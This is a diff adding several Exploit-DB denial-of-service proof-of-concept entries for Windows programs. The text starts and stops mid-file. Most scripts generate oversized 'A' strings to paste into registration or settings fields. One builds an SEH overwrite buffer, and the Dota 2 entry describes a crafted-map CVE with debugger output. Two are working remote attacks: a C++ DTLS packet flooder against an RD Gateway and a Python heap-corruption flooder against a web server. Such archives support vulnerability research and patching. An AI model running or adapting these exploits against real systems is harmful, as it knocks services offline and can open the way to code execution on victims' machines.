+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
+
+poc = DoS
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/dos/47904.py b/exploits/windows/dos/47904.py
new file mode 100755
index 000000000..00fdd1b05
--- /dev/null
+++ b/exploits/windows/dos/47904.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotDialup
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotDialup Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47906.py b/exploits/windows/dos/47906.py
new file mode 100755
index 000000000..798496482
--- /dev/null
+++ b/exploits/windows/dos/47906.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)
+# Exploit Author: Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotoutlook_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotOutlook
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotOutlook Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47907.py b/exploits/windows/dos/47907.py
new file mode 100755
index 000000000..797e3ac8a
--- /dev/null
+++ b/exploits/windows/dos/47907.py
@@ -0,0 +1,17 @@
+# Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
+# Date: 2020-01-12
+# Exploit Author: Antonio de la Piedra
+# Vendor Homepage: https://www.top-password.com/
+# Software Link: https://www.top-password.com/download/DialupPRSetup.exe
+# Version: 1.30
+# Tested on: Windows 7 SP1 32-bit
+
+# Copy paste the contents of poc.txt into the
+# User Name /  Registration Code input fields.
+
+#!/usr/bin/python
+
+poc =3D "A"*5000
+file =3D open("poc.txt","w")
+file.write(poc)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47909.py b/exploits/windows/dos/47909.py
new file mode 100755
index 000000000..c61c43b9f
--- /dev/null
+++ b/exploits/windows/dos/47909.py
@@ -0,0 +1,33 @@
+# Exploit Title: Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Backup Key Recovery
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.Backup Key Recovery Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47911.py b/exploits/windows/dos/47911.py
new file mode 100755
index 000000000..de30d0f10
--- /dev/null
+++ b/exploits/windows/dos/47911.py
@@ -0,0 +1,33 @@
+# Exploit Title: TaskCanvas 1.4.0 - 'Registration' Denial Of Service
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : https://www.digitalvolcano.co.uk/
+# Link Software : https://www.digitalvolcano.co.uk/taskcanvasdownload.html
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install TaskCanvas
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Registration -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Registration' and click on 'Ok'
+6.TaskCanvas Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47912.py b/exploits/windows/dos/47912.py
new file mode 100755
index 000000000..d68aa95a6
--- /dev/null
+++ b/exploits/windows/dos/47912.py
@@ -0,0 +1,17 @@
+# Exploit Title: Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)
+# Date: 2020-01-12
+# Exploit Author: Antonio de la Piedra
+# Vendor Homepage: https://www.top-password.com/
+# Software Link: https://www.top-password.com/download/FirefoxPRSetup.exe
+# Version: 2.8
+# Tested on: Windows 7 SP1 32-bit
+
+# Copy paste the contents of poc.txt  into the
+# User Name / Registration Code input fields.
+
+#!/usr/bin/python
+
+poc =3D "A"*5000
+file =3D open("poc.txt","w")
+file.write(poc)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47937.py b/exploits/windows/dos/47937.py
new file mode 100755
index 000000000..191a7fa8d
--- /dev/null
+++ b/exploits/windows/dos/47937.py
@@ -0,0 +1,33 @@
+# Exploit Title: APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)
+# Exploit Author: Ismail Tasdelen
+# Exploit Date: 2020-01-16
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/apkf_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install APKF Product Key Finder
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.APKF Product Key Finder Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47942.py b/exploits/windows/dos/47942.py
new file mode 100755
index 000000000..6c3723514
--- /dev/null
+++ b/exploits/windows/dos/47942.py
@@ -0,0 +1,33 @@
+# Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)
+# Exploit Author: Ismail Tasdelen
+# Exploit Date: 2020-01-16
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/gpwdfinder_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install GTalk Password Finder
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.GTalk Password Finder Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47947.py b/exploits/windows/dos/47947.py
new file mode 100755
index 000000000..96c19033e
--- /dev/null
+++ b/exploits/windows/dos/47947.py
@@ -0,0 +1,27 @@
+# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC)
+# Google Dork: NA
+# Date: 2020-01-20
+# Exploit Author: Shailesh Kumavat
+# Vendor Homepage: https://www.sysax.com/
+# Software Link: https://www.sysax.com/download.htm#sysaxserv
+# Version: Sysax Multi Server 5.50
+# Tested on: WIndow 7
+# CVE : [if applicable]
+
+1) Download software install in window 7
+2)run software then click install license
+3) upload crash.key file and it will show run again this program
+4 ) program crash , never run
+
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffertry:
+    f=open("crash.key","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47955.py b/exploits/windows/dos/47955.py
new file mode 100755
index 000000000..847df2bd7
--- /dev/null
+++ b/exploits/windows/dos/47955.py
@@ -0,0 +1,48 @@
+# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
+# Exploit Author: boku
+# Date: 2020-01-22
+# Software Vendor: Wierd Solutions
+# Vendor Homepage: https://www.weird-solutions.com
+# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
+# Version: BOOTP Turbo (x86) Version 2.0
+# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC
+# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit 
+# Replicate Crash:
+#  1) Download, Install, and Open BootP Turbo v2.0 for windows x86
+#  2) Go to Edit > Settings > Click the Detailed Logging Box
+#  3) Run python script, open created file 'crash.txt'
+#  4) Select-All > Copy All, from file
+#  5) Paste buffer in the 'Log File' text-box, Click 'OK'
+#  6) Close the 'Control Service' Pop-Up Window
+#  7) Crash with SEH Overwrite
+
+# SEH chain of main thread
+# Address    SE handler
+# 019CD254   43434343
+# 42424242   *** CORRUPT ENTRY ***
+
+# Loaded Application Modules
+#  Rebase | SafeSEH | ASLR  | NXCompat | Version, Modulename & Path
+#  True   | True    | False |  False   | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll)
+#  True   | True    | False |  False   | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll)
+#  True   | True    | False |  False   | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll)
+#  True   | True    | False |  False   | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe)
+#  True   | True    | False |  False   | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll)
+
+#!/usr/bin/python
+
+offset = '\x41'*2196
+nSEH = '\x42\x42\x42\x42'
+SEH = '\x43\x43\x43\x43'
+filler = '\x44'*(3000-len(offset+nSEH+SEH))
+
+payload = offset+nSEH+SEH+filler
+
+try:
+    f=open("crash.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47964.cpp b/exploits/windows/dos/47964.cpp
new file mode 100644
index 000000000..634f66bf8
--- /dev/null
+++ b/exploits/windows/dos/47964.cpp
@@ -0,0 +1,135 @@
+#include "BlueGate.h"
+
+/* 
+EDB Note: 
+- Download (Binary) ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-1.exe
+- Download (Source) ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-2.zip
+*/
+
+
+void error(const char* msg)
+{
+	printf("ERROR: %s\n", msg);
+	exit(EXIT_FAILURE);
+}
+
+void SOCKInit()
+{
+	WSADATA wsaData;
+	int res;
+
+	res = WSAStartup(MAKEWORD(2, 2), &wsaData);
+
+	if (res != 0)
+		error("WSAStartup failed");
+}
+
+void DTLSInit()
+{
+	SSL_library_init();
+	SSL_load_error_strings();
+	ERR_load_BIO_strings();
+	OpenSSL_add_all_algorithms();
+}
+
+int OpenUDPConnection(const char* hostname, int port)
+{
+	int sockfd;
+	sockaddr_in addr;
+
+	sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+
+	if (sockfd < 0)
+		error("Failed to open socket");
+
+	addr.sin_family = AF_INET;
+	addr.sin_port = htons(port);
+	
+	inet_pton(AF_INET, hostname, &(addr.sin_addr));
+
+	if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0)
+	{
+		closesocket(sockfd);
+		error("Failed to connect socket");
+	}
+
+	return sockfd;
+}
+
+SSL* DTLSConnection(const char* hostname)
+{
+	int sockfd;
+	int result;
+	DTLSParams client;
+	
+	sockfd = OpenUDPConnection(hostname, 3391);
+
+	client.ctx = SSL_CTX_new(DTLS_client_method());
+	client.bio = BIO_new_ssl_connect(client.ctx);
+
+	BIO_set_conn_hostname(client.bio, hostname);
+	BIO_get_ssl(client.bio, &(client.ssl));
+
+	SSL_set_connect_state(client.ssl);
+	SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY);
+
+	SSL_set_fd(client.ssl, sockfd);
+
+	if (SSL_connect(client.ssl) != 1) {
+		return NULL;
+	}
+	
+	return client.ssl;
+}
+
+int send_dos_packet(SSL* ssl, int id) {
+	CONNECT_PKT_FRAGMENT packet;
+
+	packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT;
+	packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER);
+	packet.usFragmentID = id;
+	packet.usNoOfFragments = id;
+	packet.cbFragmentLength = 1000;
+	memset(packet.fragment, 0x41, 1000);
+
+	char pkt[sizeof(packet)];
+	memcpy(&pkt, &packet, sizeof(packet));
+
+	return SSL_write(ssl, pkt, sizeof(pkt));
+}
+
+int main(int argc, char* argv[])
+{
+	
+	SSL* ssl;
+	int i = 0;
+	char* hostname;
+
+	if (argc != 2) {
+		printf("Usage: %s <IP address>\n", argv[0]);
+		return 0;
+	}
+
+	hostname = argv[1];
+
+	SOCKInit();
+	DTLSInit();
+	
+	while (i++ > -1) {
+		ssl = DTLSConnection(hostname);
+
+		if (ssl == NULL) {
+			break;
+		}
+		
+		for (int n = 0; n < 4; n++) {
+			send_dos_packet(ssl, i+n);
+			printf("Sending packet [%u]\n", i + n);
+		}
+
+		i++;
+	}
+
+
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/dos/48005.py b/exploits/windows/dos/48005.py
new file mode 100755
index 000000000..739e0c71f
--- /dev/null
+++ b/exploits/windows/dos/48005.py
@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelent 11.12_license_code.py
+#2.- Open AbsoluteTelent_license_code.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet.exe
+#4.- Select "Help" > "Enter License Key"
+#5.- In "License code" paste Clipboard
+#6.- Crashed
+
+cod = "\x41" * 2500
+
+f = open('AbsoluteTelent_license_code.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48006.py b/exploits/windows/dos/48006.py
new file mode 100755
index 000000000..8b24a206d
--- /dev/null
+++ b/exploits/windows/dos/48006.py
@@ -0,0 +1,23 @@
+# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelent 11.12_license_name.py
+#2.- Open AbsoluteTelent_license_name.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet.exe
+#4.- Select "Help" > "Enter License Key"
+#5.- In "License Name" paste Clipboard
+#6.- Crashed
+
+cod = "\x41" * 2500
+
+f = open('AbsoluteTelent_license_name.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48010.py b/exploits/windows/dos/48010.py
new file mode 100755
index 000000000..5323012db
--- /dev/null
+++ b/exploits/windows/dos/48010.py
@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
+# Discovery by: chuyreds 
+# Discovery Date: 2020-02-05
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelnet 11.12_username_ssh2.py
+#2.- Open absolutetelnet_username_SSH2.txtabsolutetelnet_username.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet
+#4.- Select "new connection file", "Connection", "SSH2", "Use last username"
+#5.- In "username" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("absolutetelnet_username_SSH2.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48011.py b/exploits/windows/dos/48011.py
new file mode 100755
index 000000000..bba3208c2
--- /dev/null
+++ b/exploits/windows/dos/48011.py
@@ -0,0 +1,24 @@
+# Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Tested Version: 2.12.3
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_address.py
+#2.- Open tapin_add.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
+#6.- In Port type "444" > "Username" type "test" > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 3000
+	
+f = open('tapin_add.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48013.py b/exploits/windows/dos/48013.py
new file mode 100755
index 000000000..3072578d8
--- /dev/null
+++ b/exploits/windows/dos/48013.py
@@ -0,0 +1,24 @@
+# Exploit Title: TapinRadio 2.12.3 - 'username' Denial of Service (PoC)
+# Discovery by: chuyreds 
+# Discovery Date: 2020-02-05
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Tested Version: 2.12.3
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_user.py
+#2.- Open tapin_user.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
+#6.- In Server type "1.1.1.1" > Port type 444  > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 10000
+	
+f = open('tapin_user.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48014.py b/exploits/windows/dos/48014.py
new file mode 100755
index 000000000..b2a9df448
--- /dev/null
+++ b/exploits/windows/dos/48014.py
@@ -0,0 +1,21 @@
+# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
+# Tested Version: 2.72.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: rarmaradio_username.py
+#2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Username" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+buffer = "\x41" * 5000
+f = open ("RarmaRadio2.72.4_username.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48015.py b/exploits/windows/dos/48015.py
new file mode 100755
index 000000000..63a6917f6
--- /dev/null
+++ b/exploits/windows/dos/48015.py
@@ -0,0 +1,22 @@
+# Exploit Title: RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)
+# Discovery by: chuyreds 
+# Discovery Date: 05-02-2020
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
+# Tested Version: 2.72.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: RarmaRadio2.72.4_server.py
+#2.- Open RarmaRadio2.72.4_server.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Server" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+buffer = "\x41" * 4000
+f = open ("RarmaRadio2.72.4_server.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48031.txt b/exploits/windows/dos/48031.txt
new file mode 100644
index 000000000..d3c1a2b3e
--- /dev/null
+++ b/exploits/windows/dos/48031.txt
@@ -0,0 +1,53 @@
+# Exploit Title: Dota 2 7.23f - Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2020-02-05
+# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) (bi7s)
+# Vendor Homepage: https://www.valvesoftware.com/en/
+# Software Link: N/A
+# Version: 7.23f
+# Tested on: Windows 10 (x64)
+# CVE : CVE-2020-7949
+
+
+Valve Dota 2 (schemasystem.dll) before 7.23f allows remote attackers to
+achieve code execution or denial of service by creating a gaming server and
+inviting a victim to this server, because a crafted map is mishandled
+during a GetValue call.
+
+Attacker need invite a victim to play on attacker game server using
+specially crafted map or create custom game, then when initialize the game
+of the victim, the specially crafted map will be automatically downloaded
+and processed by the victim, which will lead to the possibility to exploit
+vulnerability. Also attacker can create custom map and upload it to Steam
+<https://steamcommunity.com/sharedfiles/filedetails/?id=328258382>.
+Steps for reproduce:
+
+   1. Copy attached file zuff.vpk (
+   https://github.com/bi7s/CVE/blob/master/CVE-2020-7949/zuff.zip) to map
+   directory (C:\Program Files (x86)\Steam\steamapps\common\dota 2
+   beta\game\dota\maps)
+   2. Launch Dota2
+   3. Launch "zuff" map from Dota2 game console. Command for game console =
+   map zuff
+   4. Dota2 is crash (Access Violation)
+
+Debug information:
+
+(2098.1634): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export
+symbols for C:\Program Files (x86)\Steam\steamapps\common\dota 2
+beta\game\bin\win64\schemasystem.dll -
+(2098.1634): Access violation - code c0000005 (!!! second chance !!!)
+rax=00000000ffffffff rbx=0000027ba23dd9b6 rcx=0000027ba23dd9b6
+rdx=0000000042424242 rsi=0000027b5ffb9774 rdi=0000000000000000
+rip=00007ffa73af90ce rsp=000000e82bcfe900 rbp=0000000000000000
+ r8=00000000412ee51c  r9=000000e82bcfea88 r10=0000027b5ffb9774
+r11=00000000412ee51c r12=0000027b5ffbe582 r13=000000e82bcfe9f0
+r14=0000027b5ffb5328 r15=0000000000000010
+iopl=0         nv up ei pl nz na pe nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010200
+schemasystem!BinaryProperties_GetValue+0x10ae:
+00007ffa`73af90ce 40383b          cmp     byte ptr [rbx],dil
+ds:0000027b`a23dd9b6=??
\ No newline at end of file
diff --git a/exploits/windows/dos/48100.py b/exploits/windows/dos/48100.py
new file mode 100755
index 000000000..64c1ad2fb
--- /dev/null
+++ b/exploits/windows/dos/48100.py
@@ -0,0 +1,28 @@
+# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC)
+# Exploit Author: Berat Isler
+# Date: 2020-02-20
+# Vendor Homepage: http://www.coreftp.com/
+# Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437
+# Version: Core FTP 1.3cBuild1437
+# Tested on : Windows 7 32-bit
+
+# First step , Run exploit script, it will generate a new file with the name "mi.txt"
+# Then start Core FTP application and find the "username" textbox.
+# After that pate the content of "mi.txt" in to the "username" field like this --> "AAAAAAAAA"
+# Don't need to click anything because application is already crash.
+
+This is the code :
+
+
+#!/usr/bin/python
+    
+b0f = "A" * 7000
+payload = b0f
+try:
+    f=open("mi.txt","w")
+    print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created :) "
+except:
+    print "File cannot be created :(("
\ No newline at end of file
diff --git a/exploits/windows/dos/48111.py b/exploits/windows/dos/48111.py
new file mode 100755
index 000000000..59751311c
--- /dev/null
+++ b/exploits/windows/dos/48111.py
@@ -0,0 +1,89 @@
+# Title: Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)
+# Date: 2019-12-25
+# Author: Cody Winkler
+# Vendor Homepage: https://www.pablosoftwaresolutions.com/
+# Software Link: https://www.pablosoftwaresolutions.com/html/quick__n_easy_web_server.html
+# Version: <= 3.3.8
+# Tested on: Windows 10 x64 (wow64)
+# CVE: N/A
+
+#!/usr/bin/env python
+"""
+Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8
+
+[+] Usage: python quickwww_heap338.py <IP> <PORT>
+
+$ python exploit.py 127.0.0.1 80
+"""
+
+from __future__ import print_function
+import socket
+import sys
+import re
+
+host = sys.argv[1]
+port = int(sys.argv[2])
+
+crashed = r'(503 Service Unavailable)'
+
+http_req = "GET / HTTP/1.1\r\n"
+http_req += "Host: " + "A"*15000 + "\r\n" # 50000 A's causes an interesting double free in OLEAUT32!VariantClear() when attached to debugger
+http_req += "User-Agent: A\r\n"
+http_req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+http_req += "Accept-Language: en-US,en;q=0.5\r\n"
+http_req += "Cookie: A\r\n"
+http_req += "Connection: Close\r\n"
+http_req += "Upgrade-Insecure-Requests: 0\r\n"
+http_req += "Cache-control: max-age=0\r\n\r\n"
+
+def main():
+
+    print("[+] Remote Heap Memory Corruption in Quick n Easy Web Server <= 3.3.8")
+    i = 1
+    while( i < 1500):
+        try:
+            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            s.connect((host, port))
+            s.send(http_req)
+            print("[+] Spraying heap with %d 5000-byte requests" % i, end='\r')
+            sys.stdout.flush()
+            if re.search(crashed, s.recv(1024)):
+                print(" "*50)
+                print("[+] Threads have exited BAADF00D with %d requests!" % i)
+                s.close()
+                exit()
+            s.close()
+            i = i+1
+        except Exception, msg:
+            print("[-] Something went wrong :(")
